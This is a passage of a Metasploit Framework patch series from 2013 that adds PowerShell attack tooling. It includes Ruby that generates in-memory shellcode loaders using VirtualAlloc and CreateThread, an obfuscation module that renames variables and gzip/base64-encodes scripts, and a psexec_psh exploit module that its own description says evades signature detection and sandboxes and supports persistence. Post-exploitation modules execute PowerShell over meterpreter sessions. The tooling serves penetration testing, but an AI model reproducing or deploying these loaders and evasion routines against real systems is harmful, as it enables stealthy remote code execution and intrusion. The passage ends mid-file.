+                psh << "namespace #{var_kernel32} {\r\n"
+                psh << "public class #{var_function} {\r\n"
+                psh << "[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }\r\n"
+                psh << "[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }\r\n"
+                psh << "[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }\r\n"
+                psh << "[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n"
+                psh << "[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\r\n"
+                psh << "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);\r\n"
+                psh << "} }\r\n"
+                psh << "\"@\r\n\r\n"
+                # Creat the compiler and set options for in-memory compile
+                psh << "$#{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider\r\n"
+                psh << "$#{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters\r\n"
+                psh << "$#{var_compileParams}.ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))\r\n"
+                psh << "$#{var_compileParams}.GenerateInMemory = $True\r\n"
+                psh << "$#{var_output} = $#{var_codeProvider}.CompileAssemblyFromSource($#{var_compileParams}, $#{var_syscode})\r\n\r\n"
+                # Generate our payload byte array
+                # My apologies to the formatting gods, but this type of payload
+                # is space constrained by cmd.exe's character limit.
+                # The usual convention for col-width in the payload variable is untenable here
+                psh << "[Byte[]]$#{var_code} = #{Rex::Text.to_hex(code).gsub('\x',',0x')[1..-1]}\r\n"
+                psh << "$#{var_baseaddr} = [#{var_kernel32}.#{var_function}]::VirtualAlloc(0, $#{var_code}.Length + 1, [#{var_kernel32}.#{var_function}+AllocationType]::Reserve -bOr [#{var_kernel32}.#{var_function}+AllocationType]::Commit, [#{var_kernel32}.#{var_function}+MemoryProtection]::ExecuteReadWrite)\r\n"
+                psh << "if ([Bool]!$#{var_baseaddr}) { $global:result = 3; return }\r\n"
+                psh << "[System.Runtime.InteropServices.Marshal]::Copy($#{var_code}, 0, $#{var_baseaddr}, $#{var_code}.Length)\r\n"
+                psh << "[IntPtr] $#{var_threadHandle} = [#{var_kernel32}.#{var_function}]::CreateThread(0,0,$#{var_baseaddr},0,0,0)\r\n"
+                psh << "if ([Bool]!$#{var_threadHandle}) { $global:result = 7; return }\r\n"
+                psh << "$#{var_temp} = [#{var_kernel32}.#{var_function}]::WaitForSingleObject($#{var_threadHandle}, [#{var_kernel32}.#{var_function}+Time]::Infinite) | Out-Null\r\n"
+        end 
 
-		psh << "[Byte[]]$#{var_code} = 0x#{code[0].to_s(16)}"
-		lines = []
-		1.upto(code.length-1) do |byte|
-			if(byte % 10 == 0)
-				lines.push "\r\n$#{var_code} += 0x#{code[byte].to_s(16)}"
-			else
-				lines.push ",0x#{code[byte].to_s(16)}"
-			end
-		end
-		psh << lines.join("") + "\r\n\r\n"
+        def self.to_win32pe_psh(framework, code, opts={})
 
-		psh << "$#{var_baseaddr} = [#{var_kernel32}.func]::VirtualAlloc(0, $#{var_code}.Length + 1, [#{var_kernel32}.func+AllocationType]::Reserve -bOr [#{var_kernel32}.func+AllocationType]::Commit, [#{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)\r\n"
-		psh << "if ([Bool]!$#{var_baseaddr}) { $global:result = 3; return }\r\n"
-		psh << "[System.Runtime.InteropServices.Marshal]::Copy($#{var_code}, 0, $#{var_baseaddr}, $#{var_code}.Length)\r\n"
-		psh << "[IntPtr] $#{var_threadHandle} = [#{var_kernel32}.func]::CreateThread(0,0,$#{var_baseaddr},0,0,0)\r\n"
-		psh << "if ([Bool]!$#{var_threadHandle}) { $global:result = 7; return }\r\n"
-		psh << "$#{var_temp} = [#{var_kernel32}.func]::WaitForSingleObject($#{var_threadHandle}, [#{var_kernel32}.func+Time]::Infinite)\r\n"
-	end
+                var_code = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_win32_func = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_payload = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_size = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_rwx = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_iter = Rex::Text.rand_text_alpha(rand(3)+2)
 
-	def self.to_win32pe_psh(framework, code, opts={})
-
-		var_code = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_win32_func = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_payload = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_size = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_rwx = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_iter = Rex::Text.rand_text_alpha(rand(8)+8)
-		code = code.unpack("C*")
-
-		# Add wrapper script
-		psh = "$#{var_code} = @\"\r\n"
-		psh << "[DllImport(\"kernel32.dll\")]\r\n"
-		psh << "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n"
-		psh << "[DllImport(\"kernel32.dll\")]\r\n"
-		psh << "public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\r\n"
-		psh << "[DllImport(\"msvcrt.dll\")]\r\n"
-		psh << "public static extern IntPtr memset(IntPtr dest, uint src, uint count);\r\n"
-		psh << "\"@\r\n"
-		psh << "$#{var_win32_func} = Add-Type -memberDefinition $#{var_code} -Name \"Win32\" -namespace Win32Functions -passthru\r\n"
-		# Set up the payload string
-		psh << "[Byte[]]$#{var_payload} = 0x#{code[0].to_s(16)}"
-		lines = []
-		1.upto(code.length-1) do |byte|
-			if(byte % 10 == 0)
-				lines.push "\r\n$#{var_payload} += 0x#{code[byte].to_s(16)}"
-			else
-				lines.push ",0x#{code[byte].to_s(16)}"
-			end
-		end
-		psh << lines.join("") + "\r\n\r\n"
-		psh << "$#{var_size} = 0x1000\r\n"
-		psh << "if ($#{var_payload}.Length -gt 0x1000) {$#{var_size} = $#{var_payload}.Length}\r\n"
-		psh << "$#{var_rwx}=$#{var_win32_func}::VirtualAlloc(0,0x1000,$#{var_size},0x40)\r\n"
-		psh << "for ($#{var_iter}=0;$#{var_iter} -le ($#{var_payload}.Length-1);$#{var_iter}++) {$#{var_win32_func}::memset([IntPtr]($#{var_rwx}.ToInt32()+$#{var_iter}), $#{var_payload}[$#{var_iter}], 1)}\r\n"
-		psh << "$#{var_win32_func}::CreateThread(0,0,$#{var_rwx},0,0,0)\r\n"
+                # Add wrapper script
+                psh = "$#{var_code} = @\"\r\n"
+                psh << "[DllImport(\"kernel32.dll\")]\r\n"
+                psh << "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n"
+                psh << "[DllImport(\"kernel32.dll\")]\r\n"
+                psh << "public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\r\n"
+                psh << "[DllImport(\"msvcrt.dll\")]\r\n"
+                psh << "public static extern IntPtr memset(IntPtr dest, uint src, uint count);\r\n"
+                psh << "\"@\r\n"
+                psh << "$#{var_win32_func} = Add-Type -memberDefinition $#{var_code} -Name \"Win32\" -namespace Win32Functions -passthru\r\n"
+                # Set up the payload string, see psh_net for formatting reason
+                psh << "[Byte[]]$#{var_code} = #{Rex::Text.to_hex(code).gsub('\x',',0x')[1..-1]}\r\n"
+                psh << "$#{var_size} = 0x1000\r\n"
+                psh << "if ($#{var_payload}.Length -gt 0x1000) {$#{var_size} = $#{var_payload}.Length}\r\n"
+                psh << "$#{var_rwx}=$#{var_win32_func}::VirtualAlloc(0,0x1000,$#{var_size},0x40)\r\n"
+                psh << "for ($#{var_iter}=0;$#{var_iter} -le ($#{var_payload}.Length-1);$#{var_iter}++) {$#{var_win32_func}::memset([IntPtr]($#{var_rwx}.ToInt32()+$#{var_iter}), $#{var_payload}[$#{var_iter}], 1)}\r\n"
+                psh << "$#{var_win32_func}::CreateThread(0,0,$#{var_rwx},0,0,0)\r\n"
 
 
-	end
+        end
 
 	def self.to_win32pe_vbs(framework, code, opts={})
 		to_exe_vbs(to_win32pe(framework, code, opts), opts)
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
new file mode 100644
index 0000000000..e2a6c12592
--- /dev/null
+++ b/lib/rex/exploitation/powershell.rb
@@ -0,0 +1,412 @@
+# -*- coding: binary -*-
+
+require 'zlib'
+require 'rex/text'
+
+module Rex
+module Exploitation
+
+module Powershell
+
+	module Output
+
+		def to_s
+			code
+		end
+
+		def size
+			code.size
+		end
+
+		#
+		# Return code with numbered lines
+		#
+		def to_s_lineno
+			numbered = ''
+			code.split(/\r\n|\n/).each_with_index do |line,idx|
+				numbered << "#{idx}: #{line}"
+			end
+			return numbered
+		end
+
+		#
+		# Return a zlib compressed powershell code
+		#
+		def compress_code(eof = nil)
+			# Compress using the Deflate algorithm
+			compressed_stream = Rex::Text.gzip(code)
+
+			# Base64 encode the compressed file contents
+			encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+			# Build the powershell expression
+			# Decode base64 encoded command and create a stream object
+			psh_expression =  "$stream = New-Object IO.MemoryStream(,"
+			psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+			# Uncompress and invoke the expression (execute)
+			psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
+			psh_expression << "$(New-Object IO.Compression.GzipStream("
+			psh_expression << "$stream,"
+			psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
+			psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
+
+			# If eof is set, add a marker to signify end of code output
+			#if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+			psh_expression << "echo '#{eof}';" if eof
+
+			# Convert expression to unicode
+			unicode_expression = Rex::Text.to_unicode(psh_expression)
+
+			# Base64 encode the unicode expression
+			@code = Rex::Text.encode_base64(unicode_expression)
+
+			return code
+		end
+
+		#
+		# Reverse the compression process
+		#
+		def decompress_code
+			# Decode base64 and convert to ascii
+			raw = Rex::Text.decode_base64(code)
+			ascii_expression = Rex::Text.to_ascii(raw)
+			# Extract substring with payload
+			encoded_stream = ascii_expression.scan(/FromBase64String\('(.*)'/).flatten.first
+			# Decode and decompress the string
+			return Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) )
+			# ::Zlib::Inflate.inflate( Rex::Text.decode_base64(encoded_stream) )
+		end
+	end
+
+	module Parser
+
+		#
+		# Get variable names from code, removes reserved names from return
+		#
+		def get_var_names
+			# Reserved special variables
+			# Acquired with: Get-Variable | Format-Table name, value -auto
+			res_vars = [
+				'$$',
+				'$?',
+				'$^',
+				'$_',
+				'$args',
+				'$ConfirmPreference',
+				'$ConsoleFileName',
+				'$DebugPreference',
+				'$Env',
+				'$Error',
+				'$ErrorActionPreference',
+				'$ErrorView',
+				'$ExecutionContext',
+				'$false',
+				'$FormatEnumerationLimit',
+				'$HOME',
+				'$Host',
+				'$input',
+				'$LASTEXITCODE',
+				'$MaximumAliasCount',
+				'$MaximumDriveCount',
+				'$MaximumErrorCount',
+				'$MaximumFunctionCount',
+				'$MaximumHistoryCount',
+				'$MaximumVariableCount',
+				'$MyInvocation',
+				'$NestedPromptLevel',
+				'$null',
+				'$OutputEncoding',
+				'$PID',
+				'$PROFILE',
+				'$ProgressPreference',
+				'$PSBoundParameters',
+				'$PSCulture',
+				'$PSEmailServer',
+				'$PSHOME',
+				'$PSSessionApplicationName',
+				'$PSSessionConfigurationName',
+				'$PSSessionOption',
+				'$PSUICulture',
+				'$PSVersionTable',
+				'$PWD',
+				'$ReportErrorShowExceptionClass',
+				'$ReportErrorShowInnerException',
+				'$ReportErrorShowSource',
+				'$ReportErrorShowStackTrace',
+				'$ShellId',
+				'$StackTrace',
+				'$true',
+				'$VerbosePreference',
+				'$WarningPreference',
+				'$WhatIfPreference'
+			].map(&:downcase)
+
+
+			our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
+			return our_vars.select {|v| !res_vars.include?(v)}
+		end
+
+		#
+		# Get function names from code
+		#
+		def get_func_names
+			return code.scan(/function\s([a-zA-Z\-\_]+)/).uniq.flatten
+		end
+
+		# Attempt to find string literals in PSH expression
+		def get_string_literals
+			code.scan(/@"(.*)"@|@'(.*)'@/)
+		end
+
+		#
+		# Scan code and return matches with index
+		#
+		def scan_with_index(str,source=code)
+			::Enumerator.new do |y|
+				source.scan(str) do
+					y << ::Regexp.last_match
+				end
+			end.map{|m| [m.to_s,m.offset(0)[0]]}
+		end
+
+		#
+		# Return matching backet type
+		#
+		def match_start(char)
+			case char
+			when '{'
+				'}'
+			when '('
+				')'
+			when '['
+				']'
+			when '<'
+				'>'
+			end
+		end
+
+		#
+		# Extract block of code between inside brackets/parens
+		#
+		# Attempts to match the bracket at idx, handling nesting manually
+		# Once the balanced matching bracket is found, all script content
+		# between idx and the index of the matching bracket is returned
+		#
+		def block_extract(idx)
+			start = code[idx]
+			stop = match_start(start)
+			delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/,code[idx+1..-1])
+			delims.map {|x| x[1] = x[1] + idx + 1}
+			c = 1
+			sidx = nil
+			# Go through delims till we balance, get idx
+			while not c == 0 and x = delims.shift do
+				sidx = x[1]
+				x[0] == stop ? c -=1 : c+=1
+			end
+			return code[idx..sidx]
+		end
+
+		def get_func(func_name, delete = false)
+			start = code.index(func_name)
+			idx = code[start..-1].index('{') + start
+			func_txt = block_extract(idx)
+			code.delete(ftxt) if delete
+			return Function.new(func_name,func_txt)
+		end
+	end # Parser
+
+	module Obfu
+
+		#
+		# Create hash of string substitutions
+		#
+		def sub_map_generate(strings)
+			map = {}
+			strings.flatten.each do |str|
+				map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
+				# Ensure our variables are unique
+				while not map.values.uniq == map.values
+					map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
+				end
+			end
+			return map
+		end
+
+		#
+		# Remove comments
+		#
+		def strip_comments
+			# Multi line
+			code.gsub!(/<#(.*?)#>/m,'')
+			# Single line
+			code.gsub!(/^#.*$|^\s+#.*$/,'')
+		end
+
+		#
+		# Remove whitespace
+		# This can break some codes using inline .NET
+		#
+		def strip_whitespace
+			code.gsub!(/\s+/,' ')
+		end
+
+
+		#
+		# Identify variables and replace them
+		#
+		def sub_vars
+			# Get list of variables, remove reserved
+			vars = get_var_names
+			# Create map, sub key for val
+			sub_map_generate(vars).each do |var,sub|
+				code.gsub!(var,sub)
+			end
+		end
+
+		#
+		# Identify function names and replace them
+		#
+		def sub_funcs
+			# Find out function names, make map
+			# Sub map keys for values
+			sub_map_generate(get_func_names).each do |var,sub|
+				code.gsub!(var,sub)
+			end
+		end
+
+		#
+		# Perform standard substitutions
+		#
+		def standard_subs(subs = %w{strip_comments strip_whitespace sub_funcs sub_vars} )
+			# Save us the trouble of breaking injected .NET and such
+			subs.delete('strip_whitespace') unless string_literals.empty?
+			# Run selected modifiers
+			subs.each do |modifier|
+				self.send(modifier)
+			end
+			code.gsub!(/^$|^\s+$/,'')
+			return code
+		end
+
+	end # Obfu
+
+	class Param
+		attr_accessor :klass, :name
+		def initialize(klass,name)
+			@klass = klass.strip.gsub(/\[|\]|\s/,'')
+			@name = name.strip.gsub(/\s|,/,'')
+		end
+
+		def to_s
+			"[#{klass}]$#{name}"
+		end
+	end
+
+	class Function
+		attr_accessor :code, :name, :params
+
+		include Output
+		include Parser
+		include Obfu
+
+		def initialize(name,code)
+			@name = name
+			@code = code
+			populate_params
+		end
+		def to_s
+			"function #{name} #{code}"
+		end
+
+		def populate_params
+			@params = []
+			start = code.index(/param\s+\(|param\(/im)
+			return unless start
+			# Get start of our block
+			idx = scan_with_index('(',code[start..-1]).first.last + start
+			pclause = block_extract(idx)
+			# Keep lines which declare a variable of some class
+			vars = pclause.split(/\n|;/).select {|e| e =~ /\]\$\w/}
+			vars.map! {|v| v.split('=',2).first}.map(&:strip)
+			# Ignore assignment, create params with class and variable names
+			vars.map {|e| e.split('$')}.each do |klass,name|
+				@params << Param.new(klass,name)
+			end
+		end
+	end
+
+	class Script
+		attr_accessor :code
+		attr_reader :functions
+
+		include Output
+		include Parser
+		include Obfu
+		# Pretend we are actually a string
+		extend Forwardable
+		# In case someone messes with String we delegate based on its instance methods
+		eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+
+		# def method_missing(meth, *args, &block)
+		#   code.send(meth,*args,&block) || (raise NoMethodError.new, meth)
+		# end
+
+		def initialize(code)
+			@code = ''
+			begin
+				# Open code file for reading
+				fd = ::File.new(code, 'rb')
+				while (line = fd.gets)
+					@code << line
+				end
+
+				# Close open file
+				fd.close
+			rescue Errno::ENAMETOOLONG, Errno::ENOENT
+				# Treat code as a... code
+				@code = code.to_s.dup # in case we're eating another script
+			end
+			@functions = get_func_names.map {|f| get_func(f)}
+		end
+
+
+		##
+		# Class methods
+		##
+
+		#
+		# Build a byte array to load into powershell code
+		#
+		def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+			code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+			code = code.unpack('C*')
+			psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+			lines = []
+			1.upto(code.length-1) do |byte|
+				if(byte % 10 == 0)
+					lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+				else
+					lines.push ",0x#{code[byte].to_s(16)}"
+				end
+			end
+			psh << lines.join("") + "\r\n"
+		end
+
+		def self.psp_funcs(dir)
+			scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
+			functions = scripts.map {|s| puts s; Script.new(s).functions}
+			return functions.flatten
+		end
+
+		#
+		# Return list of code modifier methods
+		#
+		def self.code_modifiers
+			self.instance_methods.select {|m| m =~ /^(strip|sub)/}
+		end
+	end # class Script
+
+end
+end
+end
diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
new file mode 100644
index 0000000000..d938829aec
--- /dev/null
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -0,0 +1,104 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Remote
+		Rank = ManualRanking
+
+	# Exploit mixins should be called first
+	include Msf::Exploit::Remote::SMB::Psexec
+	include Msf::Exploit::Powershell
+	include Msf::Auxiliary::Report
+	include Msf::Exploit::EXE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
+			'Description'    => %q{
+					This module uses a valid administrator username and password to execute a powershell
+				payload using a similar technique to the "psexec" utility provided by SysInternals. The
+				payload is obfuscated, zlib compressed, then encoded in base64 and executed from the commandline
+				using the -encodedcommand flag. Using this method, the payload is never written to disk, and
+				given that each payload is unique, is not prone to signature based detection.
+				Since executing shellcode in .NET requires the use of system resources from unmanaged memory space,
+				the .NET (PSH) architecture must match that of the payload. Lastly, a persist option is provided
+				to execute the payload in a while loop in order to maintain a form of persistence. In the event
+				of a sandbox observing PSH execution, a delay and other obfuscation may be added to avoid detection.
+				In order to avoid interactive process notifications for the current user, the psh payload has
+				been reduced in size and wrapped in a powershell invocation which hides the window entirely.
+			},
+
+			'Author'         => [
+				'RageLtMan <rageltman[at]sempervictus'
+			],
+
+			'License'        => MSF_LICENSE,
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'WfsDelay'     => 10,
+					'EXITFUNC' => 'thread'
+				},
+			'Payload'        =>
+				{
+					'Space'        => 8192,
+					'DisableNops'  => true,
+					'StackAdjustment' => -3500
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ],
+				],
+			'DefaultTarget'  => 0,
+			'References'     => [
+				[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+				[ 'OSVDB', '3106'],
+				[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
+				[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
+				[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
+			]
+		))
+
+		register_options([
+			OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
+			OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
+			OptBool.new('DryRun',[false,'dry run',false]),
+		], self.class)
+	end
+
+
+	def exploit
+		command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
+		if datastore['DryRun']
+			print_good command
+			return
+		end
+
+		#Try and authenticate with given credentials
+		if connect
+			begin
+				smb_login
+			rescue StandardError => autherror
+				print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
+				return
+			end
+			# Execute the powershell command
+			begin
+				print_status("#{peer} - Executing the payload...")
+				#vprint_good(command)
+				return psexec(command)
+			rescue StandardError => exec_command_error
+				print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
+				return false
+			end
+			disconnect
+		end
+	end
+
+	def peer
+		return "#{rhost}:#{rport}"
+	end
+
+end
diff --git a/modules/post/windows/manage/powershell/exec_cmd.rb b/modules/post/windows/manage/powershell/exec_cmd.rb
new file mode 100644
index 0000000000..08a491e160
--- /dev/null
+++ b/modules/post/windows/manage/powershell/exec_cmd.rb
@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+##
+# Original script comments by nick[at]executionflow.org:
+# Meterpreter script to deliver and execute powershell scripts using
+# a compression/encoding method based on the powershell PoC code
+# from rel1k and winfang98 at DEF CON 18. This script furthers the
+# idea by bypassing Windows' command character lmits, allowing the
+# execution of very large scripts. No files are ever written to disk.
+##
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/powershell'
+
+class Metasploit3 < Msf::Post
+	include Msf::Post::Windows::Powershell
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'                 => "Powershell: Execute Command",
+			'Description'          => %q{
+				This module will execute a string of Powershell and return output.
+			},
+			'License'              => MSF_LICENSE,
+			'Platform'             => ['win'],
+			'SessionTypes'         => ['meterpreter'],
+			'Author'               => [
+				'Nicholas Nam (nick[at]executionflow.org)', # original meterpreter script
+				'RageLtMan' # post module
+				]
+		))
+
+		register_options(
+			[
+				OptString.new( 'PSH_CMD',  [true, 'Powershell string to execute', "echo 'metasploited'"]),
+			], self.class)
+
+		register_advanced_options(
+			[
+				OptString.new('SUBSTITUTIONS', [false, 'Script subs in gsub format - original,sub;original,sub' ]),
+			], self.class)
+
+	end
+
+	def run
+
+		# Make sure we meet the requirements before running the script, note no need to return
+		# unless error
+		return 0 if ! (session.type == "meterpreter" || have_powershell?)
+
+		# check/set vars
+		subs = process_subs(datastore['SUBSTITUTIONS'])
+		script_in = read_script(datastore['PSH_CMD'])
+
+		# Make substitutions in script if needed
+		script_in = make_subs(script_in, subs) unless subs.empty?
+ 		print_status(script_in)
+		print_status(script_in.dup.compress_code)
+
+		# Execute the powershell script
+		print_status('Executing the script.')
+
+		ps_output = psh_exec(script_in)
+
+		print_status ps_output
+
+		# That's it
+		print_good('Finished!')
+	end
+
+end
+
diff --git a/modules/post/windows/manage/powershell/exec_script.rb b/modules/post/windows/manage/powershell/exec_script.rb
new file mode 100644
index 0000000000..ecbab8a9fc
--- /dev/null
+++ b/modules/post/windows/manage/powershell/exec_script.rb
@@ -0,0 +1,90 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+##
+# Original script comments by nick[at]executionflow.org:
+# Meterpreter script to deliver and execute powershell scripts using
+# a compression/encoding method based on the powershell PoC code
+# from rel1k and winfang98 at DEF CON 18. This script furthers the
+# idea by bypassing Windows' command character lmits, allowing the
+# execution of very large scripts. No files are ever written to disk.
+##
+
+##
+# Since the original port to Metasploit, the implementation has grown
+# to include partial PSH syntax parsing, gzip compression, rex, msf,
+# and post modules providing various layers of functionality and
+# convenience methods.
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/powershell'
+
+class Metasploit3 < Msf::Post
+	include Msf::Post::Windows::Powershell
+
+	def initialize(info={})
+		super(update_info(info,
+      'Name'                 => "Powershell: Execute Command",
+      'Description'          => %q{
+        This module will execute a Powershell script and return output
+			},
+			'License'              => MSF_LICENSE,
+			'Platform'             => ['win'],
+			'SessionTypes'         => ['meterpreter'],
+			'Author'               => [
+				'Nicholas Nam (nick[at]executionflow.org)', # original meterpreter script
+				'RageLtMan' # post module
+				]
+		))
+
+		register_options(
+			[
+				OptPath.new( 'SCRIPT',  [true, 'Path to the PS script', ::File.join(Msf::Config.install_root, "scripts", "ps", "msflag.ps1") ]),
+				OptString.new( 'PSH_CMD', [false, 'Powershell to execute after the script']),
+			], self.class)
+
+		register_advanced_options(
+			[
+				OptString.new('SUBSTITUTIONS', [false, 'Script subs in gsub format - original,sub;original,sub' ]),
+				OptBool.new(  'DELETE',        [false, 'Delete file after execution', false ]),
+			], self.class)
+
+	end
+
+	def run
+
+		# Make sure we meet the requirements before running the script, note no need to return
+		# unless error
+		return 0 if ! (session.type == "meterpreter" || have_powershell?)
+
+		# check/set vars
+		subs = process_subs(datastore['SUBSTITUTIONS'])
+		script_in = read_script(datastore['SCRIPT'])
+		if datastore['PSH_CMD']
+			script_in = read_script(script_in + "\n#{datastore['PSH_CMD']}")
+		end
+		
+
+		# Make substitutions in script if needed
+		script_in = make_subs(script_in, subs) unless subs.empty?
+		vprint_status(script_in)
+
+		# Execute the powershell script
+		print_status('Executing the script.')
+
+		ps_output = psh_exec(script_in)
+
+		print_good ps_output
+
+		# That's it
+		print_good('Finished!')
+	end
+
+end
+

From cd14569dcf957d2f710ff3fa68ab8c0e606fa9b3 Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Sat, 20 Jul 2013 19:26:03 -0400
Subject: [PATCH 003/321] Revert "post/local_admin_search_enum~Regex
 fails,module 2"

@g0tm1lk: no clue, you must've pwned me in your sl33p. :)
---
 .../post/windows/gather/local_admin_search_enum.rb | 14 ++++----------
 1 file changed, 4 insertions(+), 10 deletions(-)

diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb
index 1e405d9669..72cfcc8d7f 100644
--- a/modules/post/windows/gather/local_admin_search_enum.rb
+++ b/modules/post/windows/gather/local_admin_search_enum.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post
 		super(update_info(info,
 			'Name'         => 'Windows Gather Local Admin Search',
 			'Description'  => %q{
-				This module will identify systems in a given range that the
+					This module will identify systems in a given range that the
 				supplied domain user (should migrate into a user pid) has administrative
 				access to by using the Windows API OpenSCManagerA to establishing a handle
 				to the remote host. Additionally it can enumerate logged in users and group
@@ -80,16 +80,10 @@ class Metasploit3 < Msf::Post
 
 				# Check if RSOP data exists, if not disable group check
 				unless res =~ /does not have RSOP data./
-					dc_applied = /Group Policy was applied from:\s*(.*)\s*/.match(res)
-					if dc_applied
-						@domain_controller = dc_applied[1].strip
-					else
-						@dc_error = true
-						print_error("Could not read RSOP data, will not enumerate users and groups. Manually specify DC.")
-					end
+					@domain_controller = /Group Policy was applied from:\s*(.*)\s*/.match(res)[1].chomp
 				else
 					@dc_error = true
-					print_error("User never logged into device, will not enumerate users and groups. Manually specify DC.")
+					print_error("User never logged into device, will not enumerate groups or manually specify DC.")
 				end
 			end
 		end
@@ -261,4 +255,4 @@ class Metasploit3 < Msf::Post
 		p = store_loot(type, 'text/plain', host, "#{host}:#{user}", 'hosts_localadmin.txt', user)
 		vprint_status("User data stored in: #{p}")
 	end
-end
+end
\ No newline at end of file

From eb185375f71e6b4b8e4d63392143589ba983509e Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Sat, 20 Jul 2013 19:31:26 -0400
Subject: [PATCH 004/321] Trim to core requirements

Remove .NET compiler, post lib and modules.
---
 lib/msf/core/exploit/powershell/dot_net.rb    | 172 -----------
 lib/msf/core/post/windows/powershell.rb       | 292 ------------------
 .../windows/manage/powershell/exec_cmd.rb     |  77 -----
 .../windows/manage/powershell/exec_script.rb  |  90 ------
 4 files changed, 631 deletions(-)
 delete mode 100644 lib/msf/core/exploit/powershell/dot_net.rb
 delete mode 100644 lib/msf/core/post/windows/powershell.rb
 delete mode 100644 modules/post/windows/manage/powershell/exec_cmd.rb
 delete mode 100644 modules/post/windows/manage/powershell/exec_script.rb

diff --git a/lib/msf/core/exploit/powershell/dot_net.rb b/lib/msf/core/exploit/powershell/dot_net.rb
deleted file mode 100644
index 0369a7bd9a..0000000000
--- a/lib/msf/core/exploit/powershell/dot_net.rb
+++ /dev/null
@@ -1,172 +0,0 @@
-# -*- coding: binary -*-
-
-module Msf
-  module Exploit::Powershell
-    module DotNet
-
-    	def initialize(info = {})
-    		super
-    		register_advanced_options(
-    		[
-    			OptString.new('CERT_PATH', [false, 'Path on host to .pfx fomatted certificate for signing' ]),
-
-    		], self.class)
-    	end
-
-    	def dot_net_compiler(opts = {})
